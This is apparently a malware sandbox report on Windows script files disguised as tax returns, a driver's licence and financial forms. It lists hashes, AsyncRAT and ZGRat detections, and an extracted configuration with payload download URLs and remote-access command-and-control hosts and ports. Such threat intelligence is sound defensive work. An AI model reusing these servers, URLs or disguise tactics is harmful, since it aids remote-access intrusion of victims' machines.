Overview
overview
10Static
static
12O22-Tax-Returns.wsf
windows7-x64
102O22-Tax-Returns.wsf
windows10-2004-x64
10DRlVERS-LlCENSE.wsf
windows7-x64
10DRlVERS-LlCENSE.wsf
windows10-2004-x64
10PR0FlT&L0SS_2O23.wsf
windows7-x64
10PR0FlT&L0SS_2O23.wsf
windows10-2004-x64
10ScheduIe-K.wsf
windows7-x64
10ScheduIe-K.wsf
windows10-2004-x64
10General
-
Target
efc039447276a5cbec3a462f957db357.bin
-
Size
12KB
-
Sample
240124-eyr78aadep
-
MD5
efc039447276a5cbec3a462f957db357
-
SHA1
9cc91327363b0e1817acd480b48c0b41351ee87b
-
SHA256
a0de57ddd8f03531fe83fa680a519d69616e04919cb0b30b2a1eac69124d6131
-
SHA512
7ef82df5d5afa8b97aebb2ddadc1b2714929f1886c8cedb109930a440cb04d009a0e2223f7b492e599262651e75c64d3840a4de31ebdefa0874c14b27df7cc4b
-
SSDEEP
192:d39TSvyA1butJdIzlogSG0IfymidyaXWOLG3Zhxs+M/8n29NYmJyGGWFGGGrG7eH:+vy/dGKIKcatCDW+I9emJJSl
Static task
static1
Behavioral task
behavioral1
Sample
2O22-Tax-Returns.wsf
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
2O22-Tax-Returns.wsf
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
DRlVERS-LlCENSE.wsf
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
DRlVERS-LlCENSE.wsf
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
PR0FlT&L0SS_2O23.wsf
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
PR0FlT&L0SS_2O23.wsf
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
ScheduIe-K.wsf
Resource
win7-20231129-en
Malware Config
Extracted
http://176.107.185.29:666/Rar.jpg
http://176.107.185.29:666/load.rar
Extracted
asyncrat
AWS | 3Losh
BB
icant.theworkpc.com:6606
icant.theworkpc.com:7707
icant.theworkpc.com:8808
icant.theworkpc.com:5550
AsyncMutex_alosh
-
delay
3
-
install
false
-
install_folder
%AppData%
Targets
-
-
Target
2O22-Tax-Returns.wsf
-
Size
22KB
-
MD5
98ee1c0d924160400ecef6a607233e71
-
SHA1
bf458f68d2080dfc3b3ab557c422e003f83a80e8
-
SHA256
31474cb3c6ed64770b4930d9d0ba11edc9ba03b7c09d9a3798eb8b77a81ca50a
-
SHA512
81e77e30dcd15edf8089eb4299c4e01914a889b90eb46ba99c90087e043832e0a6caaf7fcebd51905e31f14cdab5c042bb43de9d35078c92155197a84e370be7
-
SSDEEP
384:eE3AcRO1fDgpRyeBNhQz0yFvYN5E3AcRO1fDgpRyeBNhQz0yFvYN/:x3bObgDyeHk0yFvYY3bObgDyeHk0yFvg
-
Detect ZGRat V1
-
Async RAT payload
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Suspicious use of SetThreadContext
-
-
-
Target
DRlVERS-LlCENSE.wsf
-
Size
4KB
-
MD5
caa57de08040c5a7467546b863c6dade
-
SHA1
94f12d37d102aece7d32c66256bbe40efb6c1a3b
-
SHA256
d4f23048f4310ff503350d6d936be6ceaff825ba74cedeb52a783441aca627b7
-
SHA512
123bc8e1dc3166a07692cf8f1b428cf4366daaceea60438952151cf7ea27493bb302e8f59403172857a1078c66d656d571b591d4541968958a0723626a40c957
-
SSDEEP
96:pZ9YdUGcYNSoccNLevSNbZ9YdUGcYNSoccNLevSNm:pZ9YGGcYNSoGvSpZ9YGGcYNSoGvSE
-
Detect ZGRat V1
-
Async RAT payload
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Suspicious use of SetThreadContext
-
-
-
Target
PR0FlT&L0SS_2O23.wsf
-
Size
31KB
-
MD5
20874f5aa9f33c23c82862559cba74f6
-
SHA1
bf1b13349c19b8bf9350441292adffe9846d5723
-
SHA256
edc2eeccd548103567716d8f84ffad3389e061c1a0787d38d854dbf616485ebe
-
SHA512
e553b7defd08b73ef5760b68fb47bafd2ee38763c8806b526421ff3fab70ed8240f94dae3f5c60484d779e43a6097be4714d057ba3c5c0dc2cd475ffd5b9eaed
-
SSDEEP
768:x15HSHJkDKQvY5wcx3OxhJz42O4zcHJN67+15HSHJkDKQvY5wcx3OxhJz42O4zce:xRit2wq+Rit2wq1
-
Detect ZGRat V1
-
Async RAT payload
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Suspicious use of SetThreadContext
-
-
-
Target
ScheduIe-K.wsf
-
Size
4KB
-
MD5
eafa5d2bdb1f8bca65b208d7e6101e1c
-
SHA1
da7085b340e3b02d94bb4acc92ee9475133b7948
-
SHA256
572a90ba88b5424d527785d48667dfd95293469b07ab016970b7253e2bb5d0d0
-
SHA512
2114d0dda32e2224c8253a9ec038b6f212a01082bb73222780391e0842a73097c57454f248135671f67662f419bba9c5cbb7721a1eba6790eb59381e7a4bbda8
-
SSDEEP
96:021JYd1k2ig3AwYx4wg3CWPqrHekw21JYd1k2ig3AwYx4wg3CWPqrHek4:Np2ioAwYgSWPqTeGp2ioAwYgSWPqTeB
-
Detect ZGRat V1
-
Async RAT payload
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Suspicious use of SetThreadContext
-